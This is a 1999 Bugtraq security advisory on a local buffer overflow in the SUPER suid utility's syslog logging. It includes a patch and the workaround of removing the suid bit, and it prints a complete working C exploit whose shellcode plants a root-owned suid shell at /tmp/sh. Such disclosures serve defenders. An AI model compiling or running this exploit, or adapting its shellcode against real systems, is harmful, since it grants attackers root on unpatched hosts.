Date: Thu, 25 Feb 1999 01:43:37 -0300 From: c0nd0r <root@SEKURE.ORG> Subject: SUPER buffer overflow To: BUGTRAQ@NETSPACE.ORG s e k u r e S D I http://www.sekure.org ------------------------- Brazilian Information Security Team -> SUPER's log function buffer overflow <- 1. Description We've seen a discussion weeks ago in the bugtraq mailing list about the vulnerability found in the SUPER package which could lead to root compromise. The author had released a patch and the problem was fixed in the newest version. While perusing through the super 3.11.6, we've noticed another possible buffer overflow condition if the syslog option is enabled (error.c): (Error() function) (..) if (error_syslog) { char newfmt[MAXPRINT], buf[MAXPRINT]; (..) va_start(ap, fmt); (void) vsprintf(buf, newfmt, ap); va_end(ap); (..) MAXPRINT is 1300 bytes long. Error() function is used to return error messages which means it probably use a user supplied data as an argument (it does): (time.c) (...) return Error(0, 0, "%t\n\tInvalid time <%s>\n", str); (...) str is the string supplied by the -T option. As we can see, this bug is bit different from the one reported last week. I've noticed the 3.11.9 patchlevel is vulnerable to the problem, which might mean the newest version of super is vulnerable. 2.Consequences Local user may gain root privileges. 3. Recommendations Please, apply the patch below or remove the suid bit from the super binary (chmod u-s /usr/local/bin/super). --- error.c Thu Feb 25 00:38:25 1999 +++ error.patch.c Thu Feb 25 01:07:53 1999 @@ -321,7 +321,7 @@ if (tag) StrLCat(newfmt, tag, sizeof(newfmt)); va_start(ap, fmt); - (void) vsprintf(buf, newfmt, ap); + (void) vsnprintf(buf, sizeof(buf), newfmt, ap); va_end(ap); SysLog(error_priority, buf); } @@ -485,7 +485,7 @@ StrLCat(newfmt, fmt, sizeof(newfmt)); if (tag) StrLCat(newfmt, tag, sizeof(newfmt)); - (void) vsprintf(buf, newfmt, ap); + (void) vsnprintf(buf, sizeof(buf), newfmt, ap); va_end(ap); SysLog(error_priority, buf); } 4. Exploit You will find the exploit for this issue in our page as well. http://ssc.sekure.org --------------- SDI-super.c -------------------------------------- /* * [ Sekure SDI ] * [ Brazilian Info Security Team ] * | ---------------------------------- ] * | SUPER exploit for linux | * | ---------------------------------- | * | | * | http://ssc.sekure.org | * | Sekure SDI Secure Coding Team | * | | * | ---------------------------------- | * | by c0nd0r <condor@sekure.org> | * | ---------------------------------- | * [ thanks for the ppl at sekure.org: ] * [ jamez(shellcode), bishop, dumped, ] * [ bahamas, fcon, vader, yuckfoo. ] * * * This will exploit a buffer overflow condition in the log section of * the SUPER program. * * It will create a suid bash owned by root at /tmp/sh. * (It'll defeat the debian bash-2.xx protection against rootshell) * * Note: The SUPER program must be compiled with the SYSLOG option. * * also thanks people from #uground (irc.brasnet.org network) * */ char shellcode[] = "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36" "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88" "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3" "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xca\xff\xff\xff" "/bin/sh -c cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh"; unsigned long getsp ( void) { __asm__("mov %esp,%eax"); } main ( int argc, char *argv[] ) { char itamar[2040]; // ta mar mesmo long addr; int x, y, offset = 1000, align=0; if ( argc > 1) offset = atoi(argv[1]); addr = getsp() + offset; for ( x = 0; x < (1410-strlen(shellcode)); x++) itamar[x] = 0x90; for ( ; y < strlen(shellcode); x++, y++) itamar[x] = shellcode[y]; for ( ; x < 1500; x+=4) { itamar[x ] = (addr & 0xff000000) >> 24; itamar[x+1] = (addr & 0x000000ff); itamar[x+2] = (addr & 0x0000ff00) >> 8; itamar[x+3] = (addr & 0x00ff0000) >> 16; } itamar[x++] = '\0'; printf ( "\nwargames at 0x%x, offset %d\n", addr, offset); printf ( "Look for a suid shell root owned at /tmp/sh\n"); execl ( "/usr/local/bin/super", "super", "-T",itamar, (char *) 0); } ---------------------- eof ----------------------------------------- 5. Contacts Sekure SDI Advisory is a publication of Sekure SDI Brazilian Information Security Team http://www.sekure.org mailto:info@sekure.org This advisory has been written by Secure Coding Sekure SDI Group. http://ssc.sekure.org mailto:securecode@sekure.org Subscribe the "Best of Security Brasil" (bos-br) Mailing list http://bos.sekure.org (portuguese as the main language) mailto:bos-br-request@sekure.org --- securecode@sekure.org written by c0nd0r <condor@sekure.org>